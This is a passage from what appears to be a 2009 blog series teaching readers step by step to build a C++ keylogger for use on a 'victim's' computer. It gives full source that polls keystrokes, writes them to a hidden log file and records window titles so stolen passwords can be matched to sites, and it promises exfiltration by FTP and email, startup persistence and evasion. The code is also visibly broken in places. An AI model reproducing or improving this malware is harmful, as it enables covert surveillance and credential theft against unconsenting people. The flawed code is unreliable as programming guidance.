storekey << endl << currentwindowtitle << endl;
storekey.close;
strcpy(newwindowtitle, currentwindowtitle);
}
keyinstring = convertkey(key);
StoreKey(keyinstring);
}
}
}
}

int main(){
Logger();
return 1;
}

--------------------------------------------------------------------------------

Be sure to SUBSCRIBE, COMMENT, and request new tutorials and features. Hope you enjoyed this and put it to good use ;]

-badfish303

Thursday, May 7, 2009

Adding to our C++ Keylogger (Window Text and Special Characters)

Well, for those of you who have tried it out so far, nobody subscribed =( but anyway i guess i am obligated to add more, but please guys subscribe and comments, otherwise I wont know if anyone is reading this.

---------------------------------------------------------------------------------

Anyways here goes.
So as of now, we have a very simple keylogger, it takes in the keys that the victim types in and outputs them to a specified file. Well there are many problems with this keylogger. I'll help you solve one of these with this post.

Firstly, you would have to go the victims computer to retrieve the file, and most of the time this isn't a possibility. Also, if you have tried the keylogger out, you would have noticed that it doesnt resolve many of the characters like "Enter" and "Shift" and stuff. The next post will deal with ftp uploading and resolving these characters but this post will focus on a very important necessity to any keylogger, getting the window. The problem with many loggers is that you may have some passwords or something but you will never know what these passwords are for. So for that, you need to be able to get the window text.

Also remember that if you get the window text for a browser, it also tells you what webpage they are on, ie yahoo mail so this function can be very useful.

First, we have to familiarize ourselves with the API's that will help us get the window text. They are pretty self explanatory really, GetWindowText(); and GetForegroundWindow();. The msdn's for both are as follows respectively
GetWindowText
GetForegroundWindow()

Okay so after reading those we can see that GetForegroundWindow returns a handle to the foreground window or whatever window is selected. GetWindowText points the text of the window to a buffer with a specific length.

So in order to get the window text of the foreground window all we would have to do would be:



void getwindow(){
char window[MAX_PATH];
HWND currentwindow;
currentwindow = GetForegroundWindow();
GetWindowText(currentwindow, window, sizeof(window));
}


So this simple method returns the foreground window to the handle "currentwindow" and then uses GetWindowText to assign the buffer window with the size using the sizeof function the name of the current window. Well this is all good but when it comes to implementing it into our keylogger, putting this into the main function will just get the window text once, at the start of the program. In contrast, putting this in the check keys loop will get the window text and print it out every single time it goes through the loop, which means that your log will be overflowed with the same window title.

However, what if we put it in the loop, but only print it if the window has changed.
In other words, why dont we check what the window is, and then if that changes, we output the new window, that way we will have the names of all the windows that it were typed into and nothing more or less.

So lets modify our logger function:



void Logger()
{
char key[20];
char currentwindowtitle[MAX_PATH];
char newwindowtitle[MAX_PATH];
GetWindowText(GetForegroundWindow(), currentwindowtitle, sizeof(currentwindowtitle));
while(true)
{
Sleep(5);
for(key = 8; key <= 256; key++)
{
if(GetAsyncKeyState(key)&1 == 1)
{
GetWindowText(GetForegroundWindow(), currentwindowtitle, sizeof(currentwindowtitle));
if (strcmp(newwindowtitle, currentwindowtitle) != 0)
{
ofstream storekey("C:\\storekey.txt", ios::app);
storekey << endl << currentwindowtitle << endl;
storekey.close;
strcpy(newwindowtitle, currentwindowtitle);
}
StoreKey(key);
}
}
}
}


So lets have a look at what this code does differently from our old Logger() function. First, it initializes the currentwindowtitle variable with the current window, then every time it loops through, it checks if the new window is the same as the old window, using the return value from the strcpy (string copy) function, and if it is different, then it outputs to the logfile. It also then changes the currentwindowtitle to the newtitle and then does it all over again. So there we have it, a keylogger that can tell you exactly where your victim is typing their passwords etc. Have fun, and remember to subscribe and to comment. Remember, if you want to request any functionality for the logger or anything, COMMENT and recommend this site to all your friends! Next post will deal with some very exciting stuff, like sending you the logs, so remember to subscribe so you know when that comes out. Come on guys, show me some love. The following is the complete code of our keylogger so far.

---------------------------------------------------------------------------------


#include <windows.h>
#include <fstream>


using namespace std;

void StoreKey(char key){
ofstream storekey("C:\\storekey.txt", ios::app);
storekey << key;
storekey.close;
}

void Logger()
{
char key[20];
char currentwindowtitle[MAX_PATH];
char newwindowtitle[MAX_PATH];
GetWindowText(GetForegroundWindow(), currentwindowtitle, sizeof(currentwindowtitle));
while(true)
{
Sleep(5);
for(key = 8; key <= 256; key++)
{
if(GetAsyncKeyState(key)&1 == 1)
{
GetWindowText(GetForegroundWindow(), currentwindowtitle, sizeof(currentwindowtitle));
if (strcmp(newwindowtitle, currentwindowtitle) != 0)
{
ofstream storekey("C:\\storekey.txt", ios::app);
storekey << endl << currentwindowtitle << endl;
storekey.close;
strcpy(newwindowtitle, currentwindowtitle);
}
StoreKey(key);
}
}
}
}

int main(){
Logger();
return 1;
}


-------------------------------------------------------------------------------

Remember to subscribe and COMMENT if you want me to keep writing this. Thanks Guys.

-badfish303

Tuesday, May 5, 2009

Building a C++ Keylogger

Well, a lot of people have been asking me if there is such thing as an undetectable keylogger and after some quick searching I decided to code one myself. Here is the catch, first of all I'm not going to give you the .exe just the source, you can compile it yourself. Second of all, we are gonna do it one step at a time, one post at a time. But believe me, once we are through we will have a kickass keylogger.

Some features that we will go over:

- Sending logs via FTP
- Sending logs through email
- Running as a system process
- Running on startup
- Window titles and screenshots

What you will need:

- A basic knowledge of C++ (Very Basic)

- A compiler (I did these with Dev)
heres the link to download dev c++ http://www.bloodshed.net/dev/devcpp.html
scroll to the bottom and there is the dload link

- 10 -15 minutes
- A mouse click to subscribe to my blog!

Firstly, we have to understand the 2 basic types of keyloggers:
- Userland based loggers that capture the current state of the keyboard
- Keyboard hooks, filter drivers, or rootkits, that actually intercept the signals

For all intents and purposes, a well coded hook can easily avoid detection, but well coded is very hard to do and to explain, and you can understand it much better if we start with the Userland loggers which can be just as effective.

How these loggers work:

Windows conveniently provides a very nice API which is always undetectable because well, its used for just about anything, including keyloggers. The API is called GetAsyncKeyState()
a quick msdn search reveals that this function takes one value, the vkey or virtual key, an ascii decimal or hex value which represents the key. C++ also comes with some predefined values for example VK_SHIFT is the shift key, you dont need the decimal value. Anyway, this function also returns whether or not the key is pressed down or not. Heres the msdn link.

So, we can use GetAsyncKeyState to check whether the key is pressed down or not, well how does that help us log it? Well you have to walk before you can crawl so first lets add this to our code.


void Logger(){
int key;
GetAsyncKeyState(key);
}


Nows the fun part, if we can check if a key is pressed down, why dont we have the program check all the keys for if they are pressed down? Then we will know which key to log? Sounds hard? well no its not, atleast not if we use loops.




void Logger() {
char key[10];
while(true) {
Sleep(5);
for(key = 8; key <= 256; i++){
if(GetAsyncKeyState(key)==-32767){
StoreKey(key);
}
}
}
}




lets analyze what this code does, first we initiate a constant while loop. Inside the loop, there is another for loop which cycles through all the common ASCII values and checks if they are being pressed down. If they are, stores this in a file with the storekey function which we will write next. In addition, there is also a Sleep(5); to make sure that this doesnt take up 100% of the cpu and attract the victim's attention.

Now for the store key function.



void StoreKey(char key){
ofstream storekey("C:\\storekey.txt", ios::app);
storekey << key;
storekey.close;
}


This function opens a new ofstream, storekey that directs to a file named storekey.txt in the C drive, it then logs the key to that file and closes the file.

Well now for the complete code. Remember, if you liked this code and want more remember to subscribe and comment! come on guys, i need incentive to keep doing this.
THANKS

--------------------------------------------------------------------------------


#include <windows.h>
#include <fstream>

using namespace std;

void StoreKey(char key){
ofstream storekey("C:\\storekey.txt", ios::app);
storekey << key;
storekey.close;
}


void Logger() {
char key[10];
while(true) {
Sleep(5);
for(key = 8; key <= 256; i++){
if(GetAsyncKeyState(key)==-32767){
StoreKey(key);
}
}
}
}

int main(){
Logger();
return 1;
}


----------------------------------------------------------------------------------------------- Thats it a simple keylogger. Make sure you subscribe so you catch the next post, it will teach you how to catch all the special characters and maybe even how to send your log to yourself O.o Read! Comment! Subscribe!